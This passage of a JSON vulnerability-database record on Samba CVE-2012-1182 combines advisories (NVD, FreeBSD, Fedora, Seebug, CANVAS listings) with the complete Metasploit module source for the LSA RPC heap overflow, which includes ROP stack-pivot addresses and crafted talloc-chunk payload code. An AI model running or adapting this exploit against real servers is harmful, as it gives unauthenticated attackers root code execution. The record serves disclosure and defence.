"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-05-03T07:32:37", "id": "FEDORA:77AFB20FC7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:53:36", "description": "CVE ID: CVE-2012-1182\r\n\r\nSamba\u662f\u4e00\u5957\u5b9e\u73b0SMB\uff08Server Messages Block\uff09\u534f\u8bae\u3001\u8de8\u5e73\u53f0\u8fdb\u884c\u6587\u4ef6\u5171\u4eab\u548c\u6253\u5370\u5171\u4eab\u670d\u52a1\u7684\u7a0b\u5e8f\u3002\r\n\r\nSamba 3.6.3\u4e4b\u524d\u7248\u672c\u7684RPC\u4ee3\u7801\u751f\u6210\u5668\u5b58\u5728\u9519\u8bef\uff0c\u5bfc\u81f4\u751f\u6210\u7684\u4ee3\u7801\u4e2d\u5305\u542b\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fd9\u4e9b\u751f\u6210\u7684\u4ee3\u7801\u7528\u5728Samba\u63a7\u5236RPC\u7f51\u7edc\u6570\u636e\u5904\u7406\u7684\u90e8\u5206\u3002\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u7279\u5236\u7684RPC\u8c03\u7528\u65e0\u9700\u7528\u6237\u9a8c\u8bc1\u9020\u6210\u670d\u52a1\u5668\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nSamba < 3.6.3\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSamba\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.samba.org/", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "seebug", "title": "Samba < 3.6.3 \u7248\u672cndr_pull_lsa_SidArray\u5806\u6ea2\u51fa\u6f0f\u6d1e(CVE-2012-1182)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60050", "id": "SSV:60050", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-13T00:14:50", "description": "This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. On the other hand the module provides the StartBrute and StopBrute which allow the user to configure his own addresses.\n", "edition": 2, "cvss3": {}, "published": "2012-09-27T23:18:52", "type": "metasploit", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::RopDb\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\n 'Description' => %q{\n This module triggers a vulnerability in the LSA RPC service of the Samba daemon\n because of an error on the PIDL auto-generated code. Making a specially crafted\n call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\n trigger a heap overflow and finally execute arbitrary code with root privileges.\n\n The module uses brute force to guess the stackpivot/rop chain or the system()\n address and redirect flow there in order to bypass NX. The start and stop addresses\n for brute forcing have been calculated empirically. On the other hand the module\n provides the StartBrute and StopBrute which allow the user to configure his own\n addresses.\n },\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'blasty', # Exploit\n 'mephos', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2012-1182'],\n ['OSVDB', '81303'],\n ['BID', '52973'],\n ['ZDI', '12-069']\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 600,\n },\n 'Platform' => %w{ linux unix },\n # smbd process is killed soon after being exploited, need fork with meterpreter\n 'DefaultOptions' => { \"PrependSetreuid\" => true, \"PrependSetregid\" => true, \"PrependFork\" => true, \"AppendExit\" => true, \"WfsDelay\" => 5},\n 'Targets' =>\n [\n ['2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb67f1000 },\n 'Stop' => { 'libgcrypt_base' => 0xb69ef000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb68d9000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6ad7000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2',\n # when stack pivoting, we control dword [esi] (field \"next\" in talloc chunk), ecx and [esp+4] point to shellcode\n 'Stackpivot' => 0x0006af03, # pop ecx ; jmp dword [esi] in /lib/i386-linux-gnu/libgcrypt.so.11.6.0\n # we jump on \"pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget\n # to effectively stack pivot\n 'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret ;\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6973000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b71000 },\n 'Step' => 0x1000\n }\n }\n ],\n # default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date\n #['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\n #\t{\n #\t\t'Arch' => ARCH_CMD,\n #\t\t'Offset' => 0x11c0,\n #\t\t'Ropname' => 'Ubuntu 11.04 / 2:3.5.4~dfsg-1ubuntu8',\n #\t\t'Stackpivot' => 0,\n #\t\t'Bruteforce' =>\n #\t\t{\n #\t\t\t# The start should be 0x950 aligned, and then step 0x1000.\n #\t\t\t'Start' => { 'Ret' => 0x00230950 },\n #\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\n #\t\t\t'Step' => 0x1000\n #\t\t}\n #\t}\n #],\n ['2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8',\n 'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb694f000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b4d000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',\n 'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6962000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6a61000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['3.5.10-0.107.el5 on CentOS 5',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => '3.5.10-0.107.el5 on CentOS 5',\n 'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0x0037c000 },\n 'Stop' => { 'libgcrypt_base' => 0x09e73000 },\n 'Step' => 0x1000\n }\n }\n ]\n\n ],\n 'DisclosureDate' => '2012-04-10',\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\n OptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n if target.bruteforce?\n bf = target.bruteforce\n\n if datastore['StartBrute'] and datastore['StartBrute'] > 0\n bf.start_addresses['libgcrypt_base'] = datastore['StartBrute']\n end\n\n if datastore['StopBrute'] and datastore['StopBrute'] > 0\n bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']\n end\n\n if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']\n raise ArgumentError, \"StartBrute should not be larger than StopBrute\"\n end\n end\n super\n end\n\n def brute_exploit(target_addrs)\n print_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['libgcrypt_base'])\n datastore['DCERPC::fake_bind_multi'] = false\n datastore['DCERPC::max_frag_size'] = 4248\n datastore['DCERPC::smb_pipeio'] = 'trans'\n datastore['DCERPC::ReadTimeout'] = 3\n\n pipe = \"lsarpc\"\n\n vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')\n connect(versions: [1])\n smb_login()\n\n handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\n dcerpc_bind(handle)\n dcerpc.socket.mode = 'rw'\n # revert for other exploits\n datastore['DCERPC::smb_pipeio'] = 'rw'\n\n cmd = \";;;;\" # padding\n helper = 0\n if target['Arch'] == ARCH_CMD\n cmd << \"#{payload.encoded}\\x00\" # system argument\n tmp = cmd * (816/cmd.length)\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = addr\n elsif target['Arch'] == ARCH_X86\n cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libgcrypt_base'] })\n tmp = cmd\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = target_addrs['libgcrypt_base']+target['Stackpivot']\n # will help in stack pivot when it's not eax pointing to shellcode\n if target['Stackpivot_helper']\n helper = target_addrs['libgcrypt_base']+target['Stackpivot_helper']\n end\n end\n\n stub = \"X\" * 20\n\n stub << NDR.short(2) # level\n stub << NDR.short(2) # level 2\n stub << NDR.long(1) # auditing mode\n stub << NDR.long(1) # ptr\n stub << NDR.long(100000) # r-> count\n stub << NDR.long(20) # array size\n stub << NDR.long(0)\n stub << NDR.long(100)\n stub << rand_text_alpha(target['Offset'])\n # Crafted talloc chunk\n #stub << 'A' * 8 # next, prev\n stub << NDR.long(helper) + 'A'*4 # next, prev\n stub << NDR.long(0) + NDR.long(0) # parent, child\n stub << NDR.long(0) # refs\n #\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\n stub << NDR.long(ret_addr) # destructor # will become EIP\n stub << NDR.long(0) # name\n stub << \"AAAA\" # size\n stub << NDR.long(0xe8150c70) # flags\n stub << \"AAAABBBB\"\n stub << tmp # pointer to tmp+4 in $esp\n stub << rand_text(32632)\n stub << rand_text(62000)\n\n begin\n call(dcerpc, 0x08, stub)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n print_error('Server is most likely patched...')\n rescue Timeout::Error\n print_status(\"Timeout\")\n rescue Rex::Proto::SMB::Exceptions::LoginError\n print_status(\"Rex::Proto::SMB::Exceptions::LoginError\")\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n end\n end\n handler()\n disconnect()\n end\n\n def check\n begin\n vprint_status('Connect with SMB1 for the check method, since it needs native_lm info')\n connect(versions: [1])\n smb_login()\n disconnect()\n\n version = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\n minor = version.scan(/\\.(\\d*)$/).flatten[0].to_i\n vprint_status(\"Version found: #{version}\")\n\n return Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\n return Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\n return Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\n\n return Exploit::CheckCode::Safe\n\n rescue ::Exception\n return CheckCode::Unknown\n end\n end\n\n # Perform a DCE/RPC Function Call\n def call(dcerpc, function, data, do_recv = true)\n\n frag_size = data.length\n if dcerpc.options['frag_size']\n frag_size = dcerpc.options['frag_size']\n end\n object_id = ''\n if dcerpc.options['object_call']\n object_id = dcerpc.handle.uuid[0]\n end\n if options['random_object_id']\n object_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\n end\n\n call_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\n call_packets.each { |packet|\n write(dcerpc, packet)\n }\n\n return true if not do_recv\n\n raw_response = ''\n\n begin\n raw_response = dcerpc.read()\n rescue ::EOFError\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n if (raw_response == nil or raw_response.length == 0)\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n\n dcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)\n\n if dcerpc.last_response.type == 3\n e = Rex::Proto::DCERPC::Exceptions::Fault.new\n e.fault = dcerpc.last_response.status\n raise e\n end\n\n dcerpc.last_response.stub_data\n end\n\n # Used to create standard DCERPC REQUEST packet(s)\n def make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\n\n opnum = opnum.to_i\n size = size.to_i\n ctx = ctx.to_i\n\n chunks, frags = [], []\n ptr = 0\n\n # Break the request into fragments of 'size' bytes\n while ptr < data.length\n chunks.push( data[ ptr, size ] )\n ptr += size\n end\n\n # Process requests with no stub data\n if chunks.length == 0\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\n return frags\n end\n\n # Process requests with only one fragment\n if chunks.length == 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\n return frags\n end\n\n # Create the first fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\n\n # Create all of the middle fragments\n while chunks.length != 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\n end\n\n # Create the last fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\n\n return frags\n end\n\n # Write data to the underlying socket\n def write(dcerpc, data)\n dcerpc.socket.write(data)\n data.length\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/setinfopolicy_heap.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2021-07-28T14:33:37", "description": "**Name**| CVE_2012_1182 \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182 \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate Public: 04/10/2012 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-CVE-2012-1182 \nCVSS: 0.0 \n\n", "edition": 3, "cvss3": {}, "published": "2012-04-10T21:55:00", "title": "Immunity Canvas: CVE_2012_1182", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T21:55:00", "id": "CVE_2012_1182", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-25T14:13:35", "description": "**Name**| CVE_2012_1182_NONX \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182-NONX \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate public: 04/10/2012 \nCVE Url: N/A \nCVSS: 0.0 \n\n", "edition": 2, "cvss3": {}, "published": "2012-04-10T17:55:02", "type": "canvas", "title": "Immunity Canvas: CVE_2012_1182_NONX", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T17:55:02", "id": "CVE_2012_1182_NONX", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182_NONX", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T16:03:49", "description": "\n\nSamba development team reports:\n\nSamba versions 3.6.3 and all versions previous to this\n\t are affected by a vulnerability that allows remote code\n\t execution as the \"root\" user from an anonymous connection.\nAs this does not require an authenticated connection it\n\t is the most serious vulnerability possible in a program,\n\t and users and vendors are encouraged to patch their Samba\n\t installations immediately.\n\n\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "freebsd", "title": "samba -- \"root\" credential remote code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "BAF37CD2-8351-11E1-894E-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:57:20", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "cvss3": {}, "published": "2012-04-10T21:55:00", "type": "cve", "title": "CVE-2012-1182", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:samba:samba:3.3.12", "cpe:/a:samba:samba:3.4.12", "cpe:/a:samba:samba:3.3.10", "cpe:/a:samba:samba:3.0.12", "cpe:/a:samba:samba:3.3.4", "cpe:/a:samba:samba:3.0.9", "cpe:/a:samba:samba:3.3.9", "cpe:/a:samba:samba:3.4.6", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:3.3.15", "cpe:/a:samba:samba:3.0.31", "cpe:/a:samba:samba:3.3.2", "cpe:/a:samba:samba:3.2.6", "cpe:/a:samba:samba:3.0.23d", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:3.4.3", "cpe:/a:samba:samba:3.2.13", "cpe:/a:samba:samba:3.3.8", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:3.0.6", "cpe:/a:samba:samba:3.4.7", "cpe:/a:samba:samba:3.2.14", "cpe:/a:samba:samba:3.2.11", "cpe:/a:samba:samba:3.0.37", "cpe:/a:samba:samba:3.4.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.0.26", "cpe:/a:samba:samba:3.0.14a", "cpe:/a:samba:samba:3.0.28", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:3.0.25b", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.13", "cpe:/a:samba:samba:3.4.11", "cpe:/a:samba:samba:3.2.9", "cpe:/a:samba:samba:3.0.24", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.0.25", "cpe:/a:samba:samba:3.2.7", "cpe:/a:samba:samba:3.0.20a", "cpe:/a:samba:samba:3.0.21a", "cpe:/a:samba:samba:3.0.18", "cpe:/a:samba:samba:3.2.0", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.2.5", "cpe:/a:samba:samba:3.0.23c", "cpe:/a:samba:samba:3.0.32", "cpe:/a:samba:samba:3.4.2", "cpe:/a:samba:samba:3.0.25c", "cpe:/a:samba:samba:3.0.26a", "cpe:/a:samba:samba:3.0.8", "cpe:/a:samba:samba:3.0.20b", "cpe:/a:samba:samba:3.2.2", "cpe:/a:samba:samba:3.4.15", "cpe:/a:samba:samba:3.3.1", "cpe:/a:samba:samba:3.0.11", "cpe:/a:samba:samba:3.2.15", "cpe:/a:samba:samba:3.2.3", "cpe:/a:samba:samba:3.0.15", "cpe:/a:samba:samba:3.0.7", "cpe:/a:samba:samba:3.4.5", "cpe:/a:samba:samba:3.0.20", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:3.0.23", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:3.3.16", "cpe:/a:samba:samba:3.0.23a", "cpe:/a:samba:samba:3.0.33", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.0.5", "cpe:/a:samba:samba:3.3.6", "cpe:/a:samba:samba:3.4.8", "cpe:/a:samba:samba:3.0.4", "cpe:/a:samba:samba:3.0.27", "cpe:/a:samba:samba:3.2.10", "cpe:/a:samba:samba:3.4.4", "cpe:/a:samba:samba:3.0.21b", "cpe:/a:samba:samba:3.3.7", "cpe:/a:samba:samba:3.0.25a", "cpe:/a:samba:samba:3.0.10", "cpe:/a:samba:samba:3.3.5", "cpe:/a:samba:samba:3.0.19", "cpe:/a:samba:samba:3.4.14", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.17", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:3.0.35", "cpe:/a:samba:samba:3.2.12", "cpe:/a:samba:samba:3.1.0", "cpe:/a:samba:samba:3.0.36", "cpe:/a:samba:samba:3.0.21", "cpe:/a:samba:samba:3.3.11", "cpe:/a:samba:samba:3.2.8", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:3.2.4", "cpe:/a:samba:samba:3.0.34", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.0.2a", "cpe:/a:samba:samba:3.0.22", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.14", "cpe:/a:samba:samba:3.0.16", "cpe:/a:samba:samba:3.4.9", "cpe:/a:samba:samba:3.4.10", "cpe:/a:samba:samba:3.0.30", "cpe:/a:samba:samba:3.3.3", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:3.0.23b", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.3.0", "cpe:/a:samba:samba:3.4.1", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.3.13", "cpe:/a:samba:samba:3.2.1", "cpe:/a:samba:samba:3.3.14", "cpe:/a:samba:samba:3.4.0", "cpe:/a:samba:samba:3.0.21c", "cpe:/a:samba:samba:3.0.29"], "id": "CVE-2012-1182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.8:*:*:*:*:*:*:*", 